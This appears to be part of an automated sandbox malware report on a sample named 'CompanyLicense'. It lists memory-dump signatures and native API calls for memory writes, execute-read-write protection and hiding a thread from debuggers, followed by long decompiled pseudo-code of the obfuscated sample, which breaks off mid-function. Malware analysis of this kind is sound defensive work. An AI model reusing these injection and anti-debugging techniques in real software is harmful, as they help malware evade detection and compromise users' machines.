                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: InformationThread
                                      • String ID: 1.!T$Msi.dll
                                      • API String ID: 4046476035-1822015534
                                      • Opcode ID: 6c140333d961bdb831968f344efa957b945f94a06249c5de528568f671feccfe
                                      • Instruction ID: 7e7e5a79cbb102e2526ddb05b51b34084c116a27eb488fa62be2f43bc4d3eb82
                                      • Opcode Fuzzy Hash: 6c140333d961bdb831968f344efa957b945f94a06249c5de528568f671feccfe
                                      • Instruction Fuzzy Hash: 1A51E67468034AAAEF319EA4CCB1BEE36A6AF44344F948125FD4AAB1C0D771DD44EB14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • NtWriteVirtualMemory.NTDLL(?,?,?,00000000,?,68F644E8,?,68F644E4,00000000,68F644E8,00001000,00000040,?,?,?,68F644E4), ref: 020A399F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: MemoryVirtualWrite
                                      • String ID: j@h$iX
                                      • API String ID: 3527976591-3508662898
                                      • Opcode ID: 14476d47d29c597bf2023ca5c5b61ec9c027f5a852d5ddd9561c6830c20ecc05
                                      • Instruction ID: 79d61f7fd8995380f365927a57d5c1c6b79200e4021d0d9e75e6c20fefbfb1b5
                                      • Opcode Fuzzy Hash: 14476d47d29c597bf2023ca5c5b61ec9c027f5a852d5ddd9561c6830c20ecc05
                                      • Instruction Fuzzy Hash: 8C5194B0240308BFFF759F50DC95BE93A66FF14304F948124FA85AA1D0D7B9A9D4AB84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 020A6F5A: LoadLibraryA.KERNELBASE(?,321C9581,?,020A8349,020A32BD,00000000,00000000,00000000,00000000,?,00000000,00000000,020A0719,00000000), ref: 020A70A8
                                      • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,?,6DDC21B5,6DDB9555,?,321C9581,?,020A8349), ref: 020A0A7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: InformationLibraryLoadThread
                                      • String ID: 1.!T$Msi.dll
                                      • API String ID: 543350213-1822015534
                                      • Opcode ID: fd8243844a7b373d72ba6221b58e2dc4c3e550b3e4d3283104d48990456af713
                                      • Instruction ID: 4dae0ecd3625190c073821b1ee2101c12eacd0cc327ebcfcb780df8a7ebb6d6f
                                      • Opcode Fuzzy Hash: fd8243844a7b373d72ba6221b58e2dc4c3e550b3e4d3283104d48990456af713
                                      • Instruction Fuzzy Hash: 1741E615D49AC703C21206F41CA53C0FFB73F52A28FC521EDADA603166D7626D7487D2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • NtWriteVirtualMemory.NTDLL(?,?,?,00000000,?,68F644E8,?,68F644E4,00000000,68F644E8,00001000,00000040,?,?,?,68F644E4), ref: 020A399F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: MemoryVirtualWrite
                                      • String ID: j@h$iX
                                      • API String ID: 3527976591-3508662898
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtWriteVirtualMemory.NTDLL(?,?,?,00000000,?,68F644E8,?,68F644E4,00000000,68F644E8,00001000,00000040,?,?,?,68F644E4), ref: 020A399F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: MemoryVirtualWrite
                                      • String ID: j@h
                                      • API String ID: 3527976591-152121739
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoadMemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 3389902171-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtWriteVirtualMemory.NTDLL(?,?,?,00000000,?,68F644E8,?,68F644E4,00000000,68F644E8,00001000,00000040,?,?,?,68F644E4), ref: 020A399F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: MemoryVirtualWrite
                                      • String ID:
                                      • API String ID: 3527976591-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LdrInitializeThunk.NTDLL(?,?,?,?,?,020A5210,020A555C,020A4170,020A0A81,?,6DDC21B5,6DDB9555,?,321C9581,?,020A8349), ref: 020A5095
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,020A84C3,00000040,020A32BD,00000000,00000000,00000000,00000000,?,00000000,00000000,020A0719), ref: 020A8B2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: MemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 2706961497-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004041A1(void* __eax, void* __ebx, void* __edx, void* __edi) {
                                      				void* _t166;
                                      				void* _t195;
                                      
                                      				_t166 = __edx;
                                      				 *(_t195 + 0x38) =  *(_t195 + 0x38) ^ 0x00000000;
                                      			}






                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,0000E291,FFFFAE6D,FFFFFEF2), ref: 0040437B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 56%
                                      			E0040E7AA(void* __ebx, void* __edi, void* __esi, signed int _a4) {
                                      				void* _v8;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr* _v28;
                                      				signed int _v40;
                                      				short _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				long long _v60;
                                      				char _v64;
                                      				long long _v72;
                                      				void* _v88;
                                      				short _v92;
                                      				signed int _v96;
                                      				void* _v112;
                                      				signed int _v120;
                                      				signed int _v124;
                                      				char _v128;
                                      				char _v132;
                                      				char _v136;
                                      				signed int _v140;
                                      				char _v144;
                                      				signed int _v148;
                                      				char _v152;
                                      				char _v156;
                                      				char _v160;
                                      				char _v168;
                                      				char _v176;
                                      				intOrPtr _v184;
                                      				char _v192;
                                      				char _v200;
                                      				char _v208;
                                      				char* _v216;
                                      				char _v224;
                                      				char* _v232;
                                      				intOrPtr _v240;
                                      				intOrPtr _v248;
                                      				intOrPtr _v256;
                                      				char _v260;
                                      				char _v264;
                                      				char _v268;
                                      				void* _v272;
                                      				char _v276;
                                      				char _v280;
                                      				char _v284;
                                      				char _v288;
                                      				char _v292;
                                      				intOrPtr _v296;
                                      				char _v300;
                                      				intOrPtr _v304;
                                      				char _v308;
                                      				signed int _v312;
                                      				signed int _v316;
                                      				intOrPtr* _v320;
                                      				signed int _v324;
                                      				signed int _v328;
                                      				signed int _v332;
                                      				signed int _v336;
                                      				signed int _v340;
                                      				intOrPtr* _v344;
                                      				signed int _v348;
                                      				signed int _v352;
                                      				signed int _v356;
                                      				signed int _v360;
                                      				char _v384;
                                      				signed int _v388;
                                      				signed int _v392;
                                      				signed int _v396;
                                      				signed int _v400;
                                      				signed int _v404;
                                      				signed int _v408;
                                      				intOrPtr* _v412;
                                      				signed int _v416;
                                      				signed int _v420;
                                      				intOrPtr* _v424;
                                      				signed int _v428;
                                      				intOrPtr* _v432;
                                      				signed int _v436;
                                      				intOrPtr* _v440;
                                      				signed int _v444;
                                      				intOrPtr* _v448;
                                      				signed int _v452;
                                      				intOrPtr* _v456;
                                      				signed int _v460;
                                      				intOrPtr* _v464;
                                      				signed int _v468;
                                      				intOrPtr* _v472;
                                      				signed int _v476;
                                      				intOrPtr* _v480;
                                      				signed int _v484;
                                      				signed int _v488;
                                      				intOrPtr* _v492;
                                      				signed int _v496;
                                      				intOrPtr* _v500;
                                      				signed int _v504;
                                      				intOrPtr* _v508;
                                      				signed int _v512;
                                      				intOrPtr* _v516;
                                      				signed int _v520;
                                      				intOrPtr* _v524;
                                      				signed int _v528;
                                      				intOrPtr* _v532;
                                      				signed int _v536;
                                      				signed int _v540;
                                      				signed int _v544;
                                      				intOrPtr* _v548;
                                      				signed int _v552;
                                      				intOrPtr* _v556;
                                      				signed int _v560;
                                      				intOrPtr* _v564;
                                      				signed int _v568;
                                      				signed int _v572;
                                      				intOrPtr* _v576;
                                      				signed int _v580;
                                      				intOrPtr* _v584;
                                      				signed int _v588;
                                      				intOrPtr* _v592;
                                      				signed int _v596;
                                      				intOrPtr* _v600;
                                      				signed int _v604;
                                      				intOrPtr* _v608;
                                      				signed int _v612;
                                      				signed int _v616;
                                      				intOrPtr* _v620;
                                      				signed int _v624;
                                      				intOrPtr* _v628;
                                      				signed int _v632;
                                      				intOrPtr* _v636;
                                      				signed int _v640;
                                      				intOrPtr* _v644;
                                      				signed int _v648;
                                      				intOrPtr* _v652;
                                      				signed int _v656;
                                      				intOrPtr* _v660;
                                      				signed int _v664;
                                      				intOrPtr* _v668;
                                      				signed int _v672;
                                      				intOrPtr* _v676;
                                      				signed int _v680;
                                      				intOrPtr* _v684;
                                      				signed int _v688;
                                      				signed int _v692;
                                      				intOrPtr* _v696;
                                      				signed int _v700;
                                      				intOrPtr* _v704;
                                      				signed int _v708;
                                      				signed int _v712;
                                      				intOrPtr* _v716;
                                      				signed int _v720;
                                      				intOrPtr* _v724;
                                      				signed int _v728;
                                      				signed int _v732;
                                      				signed int _v736;
                                      				signed int _t1111;
                                      				signed int _t1118;
                                      				signed int _t1126;
                                      				signed int _t1130;
                                      				char* _t1134;
                                      				signed int _t1138;
                                      				signed int _t1143;
                                      				signed int _t1147;
                                      				signed int _t1166;
                                      				signed int _t1170;
                                      				signed int* _t1175;
                                      				signed int _t1179;
                                      				signed int _t1183;
                                      				signed int _t1187;
                                      				signed int _t1192;
                                      				signed int _t1196;
                                      				char* _t1200;
                                      				signed int _t1204;
                                      				char* _t1206;
                                      				char* _t1209;
                                      				signed int _t1219;
                                      				signed int _t1233;
                                      				signed int _t1237;
                                      				char* _t1241;
                                      				signed int _t1245;
                                      				signed int _t1249;
                                      				signed int _t1253;
                                      				signed int _t1257;
                                      				signed int _t1261;
                                      				char* _t1266;
                                      				signed int _t1270;
                                      				signed int _t1274;
                                      				signed int _t1278;
                                      				char* _t1283;
                                      				signed int _t1289;
                                      				signed int _t1304;
                                      				signed int _t1309;
                                      				signed int _t1313;
                                      				char* _t1317;
                                      				signed int _t1321;
                                      				signed int _t1325;
                                      				signed int _t1329;
                                      				signed int _t1337;
                                      				signed int _t1344;
                                      				signed int _t1348;
                                      				char* _t1352;
                                      				signed int _t1356;
                                      				signed int _t1360;
                                      				signed int _t1364;
                                      				signed int _t1368;
                                      				signed int _t1372;
                                      				char* _t1376;
                                      				signed int _t1380;
                                      				signed int _t1393;
                                      				signed int _t1409;
                                      				signed int _t1413;
                                      				signed int* _t1418;
                                      				signed int _t1422;
                                      				signed int _t1426;
                                      				signed int _t1430;
                                      				signed int _t1434;
                                      				signed int _t1438;
                                      				char* _t1442;
                                      				signed int _t1446;
                                      				signed int _t1451;
                                      				signed int _t1455;
                                      				char* _t1458;
                                      				char* _t1460;
                                      				signed int _t1481;
                                      				signed int _t1485;
                                      				char* _t1489;
                                      				signed int _t1493;
                                      				signed int _t1497;
                                      				signed int _t1501;
                                      				signed int _t1515;
                                      				signed int _t1524;
                                      				signed int _t1528;
                                      				char* _t1532;
                                      				signed int _t1536;
                                      				signed int _t1543;
                                      				signed int _t1550;
                                      				signed int _t1554;
                                      				char* _t1558;
                                      				signed int _t1562;
                                      				signed int _t1570;
                                      				signed int _t1575;
                                      				void* _t1583;
                                      				signed int _t1587;
                                      				signed int _t1591;
                                      				char* _t1596;
                                      				char* _t1608;
                                      				intOrPtr _t1671;
                                      				intOrPtr _t1712;
                                      				signed int* _t1720;
                                      				void* _t1756;
                                      				void* _t1758;
                                      				intOrPtr* _t1759;
                                      				intOrPtr* _t1760;
                                      				void* _t1762;
                                      				void* _t1763;
                                      				void* _t1764;
                                      				void* _t1766;
                                      				void* _t1767;
                                      				void* _t1769;
                                      				void* _t1770;
                                      				void* _t1772;
                                      				void* _t1773;
                                      				void* _t1774;
                                      				void* _t1776;
                                      				long long* _t1777;
                                      				long long* _t1778;
                                      
                                      				_t1759 = _t1758 - 0x18;
                                      				 *[fs:0x0] = _t1759;
                                      				L004012E0();
                                      				_v28 = _t1759;
                                      				_v24 = 0x401128;
                                      				_v20 = _a4 & 0x00000001;
                                      				_a4 = _a4 & 0xfffffffe;
                                      				_v16 = 0;
                                      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012e6, _t1756);
                                      				_v8 = 1;
                                      				_v8 = 2;
                                      				_push( &_v176);
                                      				L00401442();
                                      				_v216 = L"udsanering";
                                      				_v224 = 0x8008;
                                      				_push( &_v176);
                                      				_t1111 =  &_v224;
                                      				_push(_t1111);
                                      				L00401448();
                                      				_v312 = _t1111;
                                      				_t1596 =  &_v176;
                                      				L0040143C();
                                      				if(_v312 != 0) {
                                      					_v8 = 3;
                                      					if( *0x413010 != 0) {
                                      						_v412 = 0x413010;
                                      					} else {
                                      						_push(0x413010);
                                      						_push(0x402b8c);
                                      						L0040142A();
                                      						_v412 = 0x413010;
                                      					}
                                      					_t1587 =  &_v132;
                                      					L00401430();
                                      					_v312 = _t1587;
                                      					_t1591 =  *((intOrPtr*)( *_v312 + 0x158))(_v312,  &_v120, _t1587,  *((intOrPtr*)( *((intOrPtr*)( *_v412)) + 0x300))( *_v412));
                                      					asm("fclex");
                                      					_v316 = _t1591;
                                      					if(_v316 >= 0) {
                                      						_v416 = _v416 & 0x00000000;
                                      					} else {
                                      						_push(0x158);
                                      						_push(0x403ac4);
                                      						_push(_v312);
                                      						_push(_v316);
                                      						L0040145A();
                                      						_v416 = _t1591;
                                      					}
                                      					_v384 = _v120;
                                      					_v120 = _v120 & 0x00000000;
                                      					_v168 = _v384;
                                      					_v176 = 8;
                                      					_push( &_v176);
                                      					L00401436();
                                      					L0040144E();
                                      					_t1596 =  &_v176;
                                      					L0040143C();
                                      				}
                                      				_v8 = 5;
                                      				_v232 = L"SMAAKRAVLET";
                                      				_v240 = 8;
                                      				_v168 = 0x46bb55;
                                      				_v176 = 3;
                                      				_v276 = 0x770254;
                                      				 *_t1759 =  *0x4011f8;
                                      				L004012E0();
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				_t1118 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v276, 0x15f3f,  &_v176, 0x10, _t1596);
                                      				_v312 = _t1118;
                                      				if(_v312 >= 0) {
                                      					_v420 = _v420 & 0x00000000;
                                      				} else {
                                      					_push(0x6f8);
                                      					_push(0x403918);
                                      					_push(_a4);
                                      					_push(_v312);
                                      					L0040145A();
                                      					_v420 = _t1118;
                                      				}
                                      				L0040143C();
                                      				_v8 = 6;
                                      				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v300);
                                      				_v72 = _v300;
                                      				_v8 = 7;
                                      				if( *0x413010 != 0) {
                                      					_v424 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v424 = 0x413010;
                                      				}
                                      				_t1126 =  &_v132;
                                      				L00401430();
                                      				_v312 = _t1126;
                                      				_t1130 =  *((intOrPtr*)( *_v312 + 0x78))(_v312,  &_v276, _t1126,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x304))( *_v424));
                                      				asm("fclex");
                                      				_v316 = _t1130;
                                      				if(_v316 >= 0) {
                                      					_v428 = _v428 & 0x00000000;
                                      				} else {
                                      					_push(0x78);
                                      					_push(0x403ac4);
                                      					_push(_v312);
                                      					_push(_v316);
                                      					L0040145A();
                                      					_v428 = _t1130;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v432 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v432 = 0x413010;
                                      				}
                                      				_t1134 =  &_v136;
                                      				L00401430();
                                      				_v320 = _t1134;
                                      				_t1138 =  *((intOrPtr*)( *_v320 + 0x130))(_v320,  &_v140, _t1134,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x30c))( *_v432));
                                      				asm("fclex");
                                      				_v324 = _t1138;
                                      				if(_v324 >= 0) {
                                      					_v436 = _v436 & 0x00000000;
                                      				} else {
                                      					_push(0x130);
                                      					_push(0x403ac4);
                                      					_push(_v320);
                                      					_push(_v324);
                                      					L0040145A();
                                      					_v436 = _t1138;
                                      				}
                                      				_push(0);
                                      				_push(0);
                                      				_push(_v140);
                                      				_push( &_v192); // executed
                                      				L00401424(); // executed
                                      				_t1760 = _t1759 + 0x10;
                                      				if( *0x413010 != 0) {
                                      					_v440 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v440 = 0x413010;
                                      				}
                                      				_t1143 =  &_v144;
                                      				L00401430();
                                      				_v328 = _t1143;
                                      				_t1147 =  *((intOrPtr*)( *_v328 + 0x118))(_v328,  &_v280, _t1143,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x300))( *_v440));
                                      				asm("fclex");
                                      				_v332 = _t1147;
                                      				if(_v332 >= 0) {
                                      					_v444 = _v444 & 0x00000000;
                                      				} else {
                                      					_push(0x118);
                                      					_push(0x403ac4);
                                      					_push(_v328);
                                      					_push(_v332);
                                      					L0040145A();
                                      					_v444 = _t1147;
                                      				}
                                      				_v300 =  *0x4011f0;
                                      				_v288 = 0x5f3676;
                                      				L00401418();
                                      				L0040141E();
                                      				_v284 =  *0x4011e8;
                                      				_v216 = L"BEMISTED";
                                      				_v224 = 8;
                                      				_t1608 =  &_v176;
                                      				L00401412();
                                      				_t144 =  &_v288; // 0x5f3676
                                      				 *_t1760 = _v276;
                                      				_v192 =  *0x4011e0;
                                      				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x5da19910, 0x5afc,  &_v176, _t1608, _t1608,  &_v284, _t1608,  &_v120, _v280, _t144,  &_v300, 0x7259,  &_v192);
                                      				L0040140C();
                                      				_push( &_v140);
                                      				_push( &_v144);
                                      				_push( &_v136);
                                      				_push( &_v132);
                                      				_push(4);
                                      				L00401406();
                                      				_push( &_v192);
                                      				_push( &_v176);
                                      				_push(2);
                                      				L00401400();
                                      				_t1762 = _t1760 + 0x20;
                                      				_v8 = 8;
                                      				if( *0x413010 != 0) {
                                      					_v448 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v448 = 0x413010;
                                      				}
                                      				_t1166 =  &_v132;
                                      				L00401430();
                                      				_v312 = _t1166;
                                      				_t1170 =  *((intOrPtr*)( *_v312 + 0xf8))(_v312,  &_v136, _t1166,  *((intOrPtr*)( *((intOrPtr*)( *_v448)) + 0x2fc))( *_v448));
                                      				asm("fclex");
                                      				_v316 = _t1170;
                                      				if(_v316 >= 0) {
                                      					_v452 = _v452 & 0x00000000;
                                      				} else {
                                      					_push(0xf8);
                                      					_push(0x403ac4);
                                      					_push(_v312);
                                      					_push(_v316);
                                      					L0040145A();
                                      					_v452 = _t1170;
                                      				}
                                      				_push(0);
                                      				_push(0);
                                      				_push(_v136);
                                      				_push( &_v176);
                                      				L00401424();
                                      				_t1763 = _t1762 + 0x10;
                                      				if( *0x413010 != 0) {
                                      					_v456 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v456 = 0x413010;
                                      				}
                                      				_t1175 =  &_v140;
                                      				L00401430();
                                      				_v320 = _t1175;
                                      				_t1179 =  *((intOrPtr*)( *_v320 + 0x158))(_v320,  &_v120, _t1175,  *((intOrPtr*)( *((intOrPtr*)( *_v456)) + 0x30c))( *_v456));
                                      				asm("fclex");
                                      				_v324 = _t1179;
                                      				if(_v324 >= 0) {
                                      					_v460 = _v460 & 0x00000000;
                                      				} else {
                                      					_push(0x158);
                                      					_push(0x403ac4);
                                      					_push(_v320);
                                      					_push(_v324);
                                      					L0040145A();
                                      					_v460 = _t1179;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v464 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v464 = 0x413010;
                                      				}
                                      				_t1183 =  &_v144;
                                      				L00401430();
                                      				_v328 = _t1183;
                                      				_t1187 =  *((intOrPtr*)( *_v328 + 0x160))(_v328,  &_v148, _t1183,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x300))( *_v464));
                                      				asm("fclex");
                                      				_v332 = _t1187;
                                      				if(_v332 >= 0) {
                                      					_v468 = _v468 & 0x00000000;
                                      				} else {
                                      					_push(0x160);
                                      					_push(0x403ac4);
                                      					_push(_v328);
                                      					_push(_v332);
                                      					L0040145A();
                                      					_v468 = _t1187;
                                      				}
                                      				_push(0);
                                      				_push(0);
                                      				_push(_v148);
                                      				_push( &_v208);
                                      				L00401424();
                                      				_t1764 = _t1763 + 0x10;
                                      				if( *0x413010 != 0) {
                                      					_v472 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v472 = 0x413010;
                                      				}
                                      				_t1192 =  &_v152;
                                      				L00401430();
                                      				_v336 = _t1192;
                                      				_t1196 =  *((intOrPtr*)( *_v336 + 0x158))(_v336,  &_v124, _t1192,  *((intOrPtr*)( *((intOrPtr*)( *_v472)) + 0x304))( *_v472));
                                      				asm("fclex");
                                      				_v340 = _t1196;
                                      				if(_v340 >= 0) {
                                      					_v476 = _v476 & 0x00000000;
                                      				} else {
                                      					_push(0x158);
                                      					_push(0x403ac4);
                                      					_push(_v336);
                                      					_push(_v340);
                                      					L0040145A();
                                      					_v476 = _t1196;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v480 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v480 = 0x413010;
                                      				}
                                      				_t1200 =  &_v156;
                                      				L00401430();
                                      				_v344 = _t1200;
                                      				_t1204 =  *((intOrPtr*)( *_v344 + 0x80))(_v344,  &_v276, _t1200,  *((intOrPtr*)( *((intOrPtr*)( *_v480)) + 0x308))( *_v480));
                                      				asm("fclex");
                                      				_v348 = _t1204;
                                      				if(_v348 >= 0) {
                                      					_v484 = _v484 & 0x00000000;
                                      				} else {
                                      					_push(0x80);
                                      					_push(0x403ac4);
                                      					_push(_v344);
                                      					_push(_v348);
                                      					L0040145A();
                                      					_v484 = _t1204;
                                      				}
                                      				_v292 = _v276;
                                      				_v288 = 0x84ac3;
                                      				_v388 = _v124;
                                      				_v124 = _v124 & 0x00000000;
                                      				L0040141E();
                                      				_t1206 =  &_v208;
                                      				L004013FA();
                                      				_v284 = _t1206;
                                      				_v392 = _v120;
                                      				_v120 = _v120 & 0x00000000;
                                      				_v184 = _v392;
                                      				_v192 = 8;
                                      				_t1209 =  &_v176;
                                      				L004013FA();
                                      				_v280 = _t1209;
                                      				_v216 = L"Tilsjoflingerne9";
                                      				_v224 = 8;
                                      				L004012E0();
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				asm("movsd");
                                      				_t1219 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, 0x703af6, 0x56b32da0, 0x5b04, 0x10,  &_v280,  &_v192,  &_v284,  &_v128,  &_v288,  &_v292, _t1209, _t1206);
                                      				_v352 = _t1219;
                                      				if(_v352 >= 0) {
                                      					_v488 = _v488 & 0x00000000;
                                      				} else {
                                      					_push(0x6fc);
                                      					_push(0x403918);
                                      					_push(_a4);
                                      					_push(_v352);
                                      					L0040145A();
                                      					_v488 = _t1219;
                                      				}
                                      				L0040140C();
                                      				_push( &_v148);
                                      				_push( &_v136);
                                      				_push( &_v156);
                                      				_push( &_v152);
                                      				_push( &_v144);
                                      				_push( &_v140);
                                      				_push( &_v132);
                                      				_push(7);
                                      				L00401406();
                                      				_push( &_v208);
                                      				_push( &_v192);
                                      				_push( &_v176);
                                      				_push(3);
                                      				L00401400();
                                      				_t1766 = _t1764 + 0x30;
                                      				_v8 = 9;
                                      				if( *0x413010 != 0) {
                                      					_v492 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v492 = 0x413010;
                                      				}
                                      				_t1233 =  &_v132;
                                      				L00401430();
                                      				_v312 = _t1233;
                                      				_t1237 =  *((intOrPtr*)( *_v312 + 0x60))(_v312,  &_v276, _t1233,  *((intOrPtr*)( *((intOrPtr*)( *_v492)) + 0x308))( *_v492));
                                      				asm("fclex");
                                      				_v316 = _t1237;
                                      				if(_v316 >= 0) {
                                      					_v496 = _v496 & 0x00000000;
                                      				} else {
                                      					_push(0x60);
                                      					_push(0x403ac4);
                                      					_push(_v312);
                                      					_push(_v316);
                                      					L0040145A();
                                      					_v496 = _t1237;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v500 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v500 = 0x413010;
                                      				}
                                      				_t1241 =  &_v136;
                                      				L00401430();
                                      				_v320 = _t1241;
                                      				_t1245 =  *((intOrPtr*)( *_v320 + 0x60))(_v320,  &_v280, _t1241,  *((intOrPtr*)( *((intOrPtr*)( *_v500)) + 0x308))( *_v500));
                                      				asm("fclex");
                                      				_v324 = _t1245;
                                      				if(_v324 >= 0) {
                                      					_v504 = _v504 & 0x00000000;
                                      				} else {
                                      					_push(0x60);
                                      					_push(0x403ac4);
                                      					_push(_v320);
                                      					_push(_v324);
                                      					L0040145A();
                                      					_v504 = _t1245;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v508 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v508 = 0x413010;
                                      				}
                                      				_t1249 =  &_v140;
                                      				L00401430();
                                      				_v328 = _t1249;
                                      				_t1253 =  *((intOrPtr*)( *_v328 + 0x138))(_v328,  &_v284, _t1249,  *((intOrPtr*)( *((intOrPtr*)( *_v508)) + 0x300))( *_v508));
                                      				asm("fclex");
                                      				_v332 = _t1253;
                                      				if(_v332 >= 0) {
                                      					_v512 = _v512 & 0x00000000;
                                      				} else {
                                      					_push(0x138);
                                      					_push(0x403ac4);
                                      					_push(_v328);
                                      					_push(_v332);
                                      					L0040145A();
                                      					_v512 = _t1253;
                                      				}
                                      				if( *0x413010 != 0) {
                                      					_v516 = 0x413010;
                                      				} else {
                                      					_push(0x413010);
                                      					_push(0x402b8c);
                                      					L0040142A();
                                      					_v516 = 0x413010;
                                      				}
                                      				_t1257 =  &_v144;
                                      				L00401430();
                                      				_v336 = _t1257;
                                      				_t1261 =  *((intOrPtr*)( *_v336 + 0x130))(_v336,  &_v148, _t1257,  *((intOrPtr*)( *((intOrPtr*)( *_v516)) + 0x300))( *_v516));
                                      				asm("fclex");
